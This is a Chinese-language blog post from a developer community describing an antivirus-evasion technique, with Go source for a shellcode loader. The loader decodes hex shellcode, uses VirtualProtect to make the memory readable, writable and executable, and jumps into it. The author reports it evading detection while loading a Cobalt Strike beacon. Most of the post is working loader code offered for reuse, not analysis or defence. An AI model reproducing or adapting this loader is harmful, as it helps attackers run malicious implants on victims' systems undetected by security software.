AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

我的免杀之路:虚拟保护

2021-12-06 774
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 虚拟保护技术利用的是 Windows API 中的 VirtualProtect 函数,是对应 Win32 函数的逻辑包装函数,它会在呼叫处理程序的虚拟位置空间里,变更认可页面区域上的保护。

简述


虚拟保护技术利用的是 Windows API 中的 VirtualProtect 函数,是对应 Win32 函数的逻辑包装函数,它会在呼叫处理程序的虚拟位置空间里,变更认可页面区域上的保护。说明白点,它的作用就是改变调用进程的一段页的保护属性,如果想要改变其他进程,就需要用到 VirtualProtectEx 函数。这里,我利用 VirtualProtect 函数将 shellcode 所在内存区域设置为可执行模式,并且设置好 shellcode 所在内存起始地址以及内存原始属性类型保存地址,这样的 shellcode 内存区域被设置成可执行模式后,shellcode 就会被正常执行了。


实现思路


关于VirtualProtect函数代码如下:

func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {

ret, _, _ := procVirtualProtect.Call(

uintptr(lpAddress),

uintptr(dwSize),

uintptr(flNewProtect),

uintptr(lpflOldProtect))

return ret > 0

}


简单的解释下以上的参数

lpAddress:要改变属性的内存起始地址(shellcode所在内存空间的起始地址)

dwSize:要改变属性的内存区域大小(shellcode长度大小)

flNewProtect:内存新的属性类型,设置为PAGE_EXECUTE_READWRITE(0x40)时该内存页为可读可写可执行。(此值为0x40)

备注:为什么是0x40,这个值怎么来的。下方链接有介绍哈,这里我简单解释一下。这是填的是内存保护常数,常数的值不同所对应的功能也不一样,对照链接里面的描述,因为现在我需要这个内存区域的可执行权限和写权限,所以这里的值必须得是0x40才能满足我的需求。

https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants

lpflOldProtect:内存原始属性类型保存地址。


再来看看核心代码部分:

func ShellCodeVirtualProtect(sc string) {

f := func() {}

var oldfperms uint32

if !VirtualProtect(unsafe.Pointer(*(**uintptr)(unsafe.Pointer(&f))), unsafe.Sizeof(uintptr(0)), uint32(0x40), unsafe.Pointer(&oldfperms)) {

panic("Call to VirtualProtect failed!")

}

ds, _ := hex.DecodeString(sc)

**(**uintptr)(unsafe.Pointer(&f)) = *(*uintptr)(unsafe.Pointer(&ds))

var oldshellcodeperms uint32

if !VirtualProtect(unsafe.Pointer(*(*uintptr)(unsafe.Pointer(&ds))), uintptr(len(ds)), uint32(0x40), unsafe.Pointer(&oldshellcodeperms)) {

panic("Call to VirtualProtect failed!")

}

f()

}


可见其核心就是利用 VirtualProtect 函数实现,ds 就是 shellcode。如果函数成功,则返回值非零。如果函数失败,则返回值为零。

 

最后的CS上线免杀效果:

图片1.png

图片2.png

图片3.png


参考资料:

https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect

https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants

https://blog.csdn.net/weixin_34004576/article/details/90360650

https://blog.csdn.net/zacklin/article/details/7478118



文章标签:
Windows
API
Snaker
目录
相关文章
肾透侧视攻城狮
|
3月前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
肾透侧视攻城狮
105 0
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
肾透侧视攻城狮
|
3月前
|
安全 网络协议 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-1):主动信息收集之ping、Nmap 就怕你学成黑客啦!
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-1):主动信息收集之ping、Nmap 就怕你学成黑客啦!
肾透侧视攻城狮
185 1
肾透侧视攻城狮
|
3月前
|
网络协议 安全 NoSQL
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-2):scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练、就怕你学成黑客啦!
scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
肾透侧视攻城狮
83 0
网络空间安全之一个WH的超前沿全栈技术深入学习之路(8-2):scapy 定制 ARP 协议 、使用 nmap 进行僵尸扫描-实战演练、就怕你学成黑客啦!
肾透侧视攻城狮
|
3月前
|
网络协议 安全 算法
网络空间安全之一个WH的超前沿全栈技术深入学习之路(9-2):WireShark 简介和抓包原理及实战过程一条龙全线分析——就怕你学成黑客啦!
实战:WireShark 抓包及快速定位数据包技巧、使用 WireShark 对常用协议抓包并分析原理 、WireShark 抓包解决服务器被黑上不了网等具体操作详解步骤;精典图示举例说明、注意点及常见报错问题所对应的解决方法IKUN和I原们你这要是学不会我直接退出江湖;好吧!!!
肾透侧视攻城狮
116 0
肥猪肥猪-17824
|
9月前
|
算法 搜索推荐 开发工具
探索代码的奥秘:技术感悟与实践探索操作系统的心脏:内核
【5月更文挑战第31天】在数字世界的编织中,每一行代码都承载着创造者的智慧和汗水。本文将带你深入编程的核心,揭示那些隐藏在日常开发实践中的技术真谛。从算法的精妙到系统的架构,我们将一同探讨如何通过技术提升效率,解决问题,并在这个过程中获得个人成长。 【5月更文挑战第31天】本文深入剖析了操作系统的核心组件——内核,探讨了其设计哲学、功能职责以及在现代计算环境中的重要性。通过分析内核的工作原理和它如何与硬件、软件交互,我们将揭示这个隐藏在用户界面背后的力量之源。
肥猪肥猪-17824
47 0
bruce_xiaowei
|
5月前
常见端口渗透导图
常见端口渗透导图
bruce_xiaowei
16 0
hnrk7epeorhrk
|
8月前
|
存储 传感器 数据处理
技术好文共享:计算机发展历程
技术好文共享:计算机发展历程
hnrk7epeorhrk
99 0
游客z4yknzc4u3d6i
|
SQL 数据库
计算机基础书的学习 计算机网络原理 操作系统 编译原理 数据库原理 计算机网络原理 五本基础书学习
计算机基础书的学习 计算机网络原理 操作系统 编译原理 数据库原理 计算机网络原理 五本基础书学习
游客z4yknzc4u3d6i
90 0
matches999
|
人工智能 算法 架构师
计算机学习路线规划,和我一同打开计算机学习的大门吧!
计算机学习路线规划,和我一同打开计算机学习的大门吧!
matches999
248 0
计算机学习路线规划,和我一同打开计算机学习的大门吧!
游客7cz2gpweyyu5a
|
算法 前端开发 JavaScript
聊一聊我的计算机学习经历吧(一)
hey guys ,我是 cxuan,这一篇文章我就要和你聊聊编程如何学习,这一篇文章涉及的内容简直太多了,我将从入门开始,一步一步到如何提高,然后到一些学习的相关问题,还有一些计算机相关的术语等,干货也非常多,准备好了吗?那么我们开始吧。
游客7cz2gpweyyu5a
170 0
聊一聊我的计算机学习经历吧(一)

热门文章

最新文章

  • 1
    选择DDOS防御的几个关键因素
  • 2
    对象存储 OSS图片高级压缩的功能使用及示例
  • 3
    阿里云RPA(机器人流程自动化)干货系列之二:认识RPA(下)
  • 4
    表格存储最佳实践:一种用于存储时间序列数据的表结构设计
  • 5
    有监督学习和无监督学习两者的区别
  • 6
    九爷 带你了解 Memcache工作原理总结
  • 7
    设计模式(十一):享元模式
  • 8
    软件革命所带来的挑战与风险
  • 9
    Sonnedix收购意大利11.2MW光伏电站产品组合
  • 10
    一次SSIS Package的调试经历
  • 1
    【赵渝强老师】K8s中Pod探针的TCPSocketAction
    113
  • 2
    深入剖析SVM核心机制:铰链损失函数的原理与代码实现
    104
  • 3
    Nginx,正向代理
    173
  • 4
    A Brief Introduction to DNS
    176
  • 5
    SpringBoot缓存注解使用
    121
  • 6
    vb6读取mysql,用odbc mysql 5.3版本驱动
    45
  • 7
    对Spring、SpringMVC、MyBatis框架的介绍与解释
    54
  • 8
    SpringCloudAlibaba-Seata2.0.0与Nacos2.2.1
    46
  • 9
    ES6的export命令
    46
  • 10
    Real Computer Network
    33

    • 相关课程

    更多
  • 机器阅读技术与应用
  • 场景实践- 新手玩转云计算-创建炫酷的简历网页
  • 场景实践-新手玩转云计算-搭建Linux学习环境
  • 场景实践 -新手玩转云计算制作一个浪漫的表白网页
  • 云计算工程师解析与实战-网络专家篇(体验版)

    • 相关电子书

    更多
  • 《云网络概念手册》
  • 移动虚拟化:360分身大师那些事
  • 视觉计算机开发者系列手册

    • 相关实验场景

    更多
  • 每个IT人都想学的“Web应用上云经典架构”实战
    • 下一篇
    阿里云上1分钟搞定幻兽帕鲁联机服务器搭建